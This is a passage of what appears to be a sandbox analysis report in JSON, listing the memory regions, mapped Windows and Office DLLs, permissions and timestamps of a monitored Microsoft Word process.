126976, "start_va": 48889856, "type": "region", "version": 1 }, "end_va": 49016831, "entry_point": 0, "filename": null, "id": "region_190", "name": "private_0x0000000002ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48889856, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 49020928, "type": "region", "version": 1 }, "end_va": 49545215, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x0000000002ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49020928, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49545216, "type": "region", "version": 1 }, "end_va": 50593791, "entry_point": 0, "filename": null, "id": "region_192", "name": "private_0x0000000002f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 49545216, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 50593792, "type": "region", "version": 1 }, "end_va": 51642367, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000003040000", "norm_filename": null, "region_type": "private_memory", "start_va": 50593792, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 51642368, "type": "region", "version": 1 }, "end_va": 51773439, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x0000000003140000", "norm_filename": null, "region_type": "private_memory", "start_va": 51642368, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 51773440, "type": "region", "version": 1 }, "end_va": 51904511, "entry_point": 0, "filename": null, "id": "region_195", "name": "private_0x0000000003160000", "norm_filename": null, "region_type": "private_memory", "start_va": 51773440, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 51904512, "type": "region", "version": 1 }, "end_va": 51920895, "entry_point": 51904512, "filename": "\\Windows\\System32\\stdole2.tlb", "id": "region_196", "name": "stdole2.tlb", "norm_filename": "c:\\windows\\system32\\stdole2.tlb", "region_type": "memory_mapped_file", "start_va": 51904512, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51970048, "type": "region", "version": 1 }, "end_va": 53018623, "entry_point": 0, "filename": null, "id": "region_197", "name": "private_0x0000000003190000", "norm_filename": null, "region_type": "private_memory", "start_va": 51970048, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 53018624, "type": "region", "version": 1 }, "end_va": 54067199, "entry_point": 0, "filename": null, "id": "region_198", "name": "private_0x0000000003290000", "norm_filename": null, "region_type": "private_memory", "start_va": 53018624, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4194304, "start_va": 54067200, "type": "region", "version": 1 }, "end_va": 58261503, "entry_point": 0, "filename": null, "id": "region_199", "name": "pagefile_0x0000000003390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 54067200, "timestamp": "00:00:09.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 58261504, "type": "region", "version": 1 }, "end_va": 67895295, "entry_point": 58261504, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_200", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 58261504, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 67895296, "type": "region", "version": 1 }, "end_va": 68026367, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x00000000040c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 67895296, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 68354048, "type": "region", "version": 1 }, "end_va": 69402623, "entry_point": 0, "filename": null, "id": "region_202", "name": "private_0x0000000004130000", "norm_filename": null, "region_type": "private_memory", "start_va": 68354048, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 69402624, "type": "region", "version": 1 }, "end_va": 69922815, "entry_point": 69402624, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_203", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 69402624, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 70123520, "type": "region", "version": 1 }, "end_va": 70189055, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x00000000042e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 70123520, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 71106560, "type": "region", "version": 1 }, "end_va": 71172095, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x00000000043d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 71106560, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 71172096, "type": "region", "version": 1 }, "end_va": 72220671, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x00000000043e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 71172096, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 72482816, "type": "region", "version": 1 }, "end_va": 73007103, "entry_point": 0, "filename": null, "id": "region_207", "name": "private_0x0000000004520000", "norm_filename": null, "region_type": "private_memory", "start_va": 72482816, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 73007104, "type": "region", "version": 1 }, "end_va": 81395711, "entry_point": 0, "filename": null, "id": "region_208", "name": "pagefile_0x00000000045a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 73007104, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 82378752, "type": "region", "version": 1 }, "end_va": 83427327, "entry_point": 0, "filename": null, "id": "region_209", "name": "private_0x0000000004e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 82378752, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 84410368, "type": "region", "version": 1 }, "end_va": 85458943, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x0000000005080000", "norm_filename": null, "region_type": "private_memory", "start_va": 84410368, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 85721088, "type": "region", "version": 1 }, "end_va": 86769663, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x00000000051c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 85721088, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 86835200, "type": "region", "version": 1 }, "end_va": 86900735, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000052d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 86835200, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 87687168, "type": "region", "version": 1 }, "end_va": 88735743, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x00000000053a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 87687168, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 88735744, "type": "region", "version": 1 }, "end_va": 92930047, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x00000000054a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 88735744, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16777216, "start_va": 92930048, "type": "region", "version": 1 }, "end_va": 109707263, "entry_point": 0, "filename": null, "id": "region_215", "name": "pagefile_0x00000000058a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 92930048, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 110559232, "type": "region", "version": 1 }, "end_va": 111083519, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000006970000", "norm_filename": null, "region_type": "private_memory", "start_va": 110559232, "timestamp": "00:00:09.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 111214592, "type": "region", "version": 1 }, "end_va": 111738879, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000006a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 111214592, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 111738880, "type": "region", "version": 1 }, "end_va": 112787455, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000006a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 111738880, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 112918528, "type": "region", "version": 1 }, "end_va": 113442815, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x0000000006bb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 112918528, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 114163712, "type": "region", "version": 1 }, "end_va": 115212287, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x0000000006ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 114163712, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 115343360, "type": "region", "version": 1 }, "end_va": 115867647, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x0000000006e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 115343360, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 115867648, "type": "region", "version": 1 }, "end_va": 120061951, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000006e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 115867648, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 120061952, "type": "region", "version": 1 }, "end_va": 128450559, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x0000000007280000", "norm_filename": null, "region_type": "private_memory", "start_va": 120061952, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 128450560, "type": "region", "version": 1 }, "end_va": 132648959, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x0000000007a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 128450560, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 132710400, "type": "region", "version": 1 }, "end_va": 136908799, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000007e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 132710400, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 136970240, "type": "region", "version": 1 }, "end_va": 141168639, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x00000000082a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 136970240, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 141230080, "type": "region", "version": 1 }, "end_va": 143327231, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x00000000086b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 141230080, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 143327232, "type": "region", "version": 1 }, "end_va": 148307967, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x00000000088b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 143327232, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 148307968, "type": "region", "version": 1 }, "end_va": 152502271, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x0000000008d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 148307968, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 921174016, "type": "region", "version": 1 }, "end_va": 921239551, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x0000000036e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 921174016, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1878982656, "type": "region", "version": 1 }, "end_va": 1879048191, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x000000006fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1878982656, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 208896, "start_va": 1951006720, "type": "region", "version": 1 }, "end_va": 1951215615, "entry_point": 1951006720, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_232", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1951006720, "timestamp": "00:00:09.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 1994850304, "filename": "\\Windows\\System32\\user32.dll", "id": "region_233", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1994850304, "timestamp": "00:00:09.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 1995898880, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_234", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995898880, "timestamp": "00:00:09.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_235", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:09.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1998979072, "type": "region", "version": 1 }, "end_va": 1999007743, "entry_point": 1998979072, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_236", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1998979072, "timestamp": "00:00:09.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_237", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:09.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:09.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_239", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:09.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1945600, "start_va": 5364514816, "type": "region", "version": 1 }, "end_va": 5366460415, "entry_point": 5364514816, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "id": "region_240", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "region_type": "memory_mapped_file", "start_va": 5364514816, "timestamp": "00:00:09.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 8790700589056, "type": "region", "version": 1 }, "end_va": 8790700654591, "entry_point": 0, "filename": null, "id": "region_241", "name": "private_0x000007febe960000", "norm_filename": null, "region_type": "private_memory", "start_va": 8790700589056, "timestamp": "00:00:09.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11505664, "start_va": 8791321804800, "type": "region", "version": 1 }, "end_va": 8791333310463, "entry_point": 8791321804800, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL", "id": "region_242", "name": "chart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\chart.dll", "region_type": "memory_mapped_file", "start_va": 8791321804800, "timestamp": "00:00:09.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2240512, "start_va": 8791333339136, "type": "region", "version": 1 }, "end_va": 8791335579647, "entry_point": 8791333339136, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL", "id": "region_243", "name": "riched20.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 8791333339136, "timestamp": "00:00:09.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 237568, "start_va": 8791337074688, "type": "region", "version": 1 }, "end_va": 8791337312255, "entry_point": 8791337074688, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll", "id": "region_244", "name": "onbttnwd.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll", "region_type": "memory_mapped_file", "start_va": 8791337074688, "timestamp": "00:00:09.853", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791337336832, "type": "region", "version": 1 }, "end_va": 8791337963519, "entry_point": 8791337336832, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_245", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791337336832, "timestamp": "00:00:09.853", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1564672, "start_va": 8791337992192, "type": "region", "version": 1 }, "end_va": 8791339556863, "entry_point": 8791337992192, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_246", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 8791337992192, "timestamp": "00:00:09.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1900544, "start_va": 8791339565056, "type": "region", "version": 1 }, "end_va": 8791341465599, "entry_point": 8791339565056, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_247", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 8791339565056, "timestamp": "00:00:09.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1507328, "start_va": 8791341465600, "type": "region", "version": 1 }, "end_va": 8791342972927, "entry_point": 8791341465600, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL", "id": "region_248", "name": "msptls.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 8791341465600, "timestamp": "00:00:09.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1552384, "start_va": 8791342972928, "type": "region", "version": 1 }, "end_va": 8791344525311, "entry_point": 8791342972928, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL", "id": "region_249", "name": "msointl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 8791342972928, "timestamp": "00:00:09.882", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 770048, "start_va": 8791344545792, "type": "region", "version": 1 }, "end_va": 8791345315839, "entry_point": 8791344545792, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL", "id": "region_250", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 8791344545792, "timestamp": "00:00:09.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 82046976, "start_va": 8791345332224, "type": "region", "version": 1 }, "end_va": 8791427379199, "entry_point": 8791345332224, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL", "id": "region_251", "name": "msores.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll", "region_type": "memory_mapped_file", "start_va": 8791345332224, "timestamp": "00:00:09.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9572352, "start_va": 8791427383296, "type": "region", "version": 1 }, "end_va": 8791436955647, "entry_point": 8791427383296, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL", "id": "region_252", "name": "mso99lres.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll", "region_type": "memory_mapped_file", "start_va": 8791427383296, "timestamp": "00:00:09.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3178496, "start_va": 8791437017088, "type": "region", "version": 1 }, "end_va": 8791440195583, "entry_point": 8791437017088, "filename": 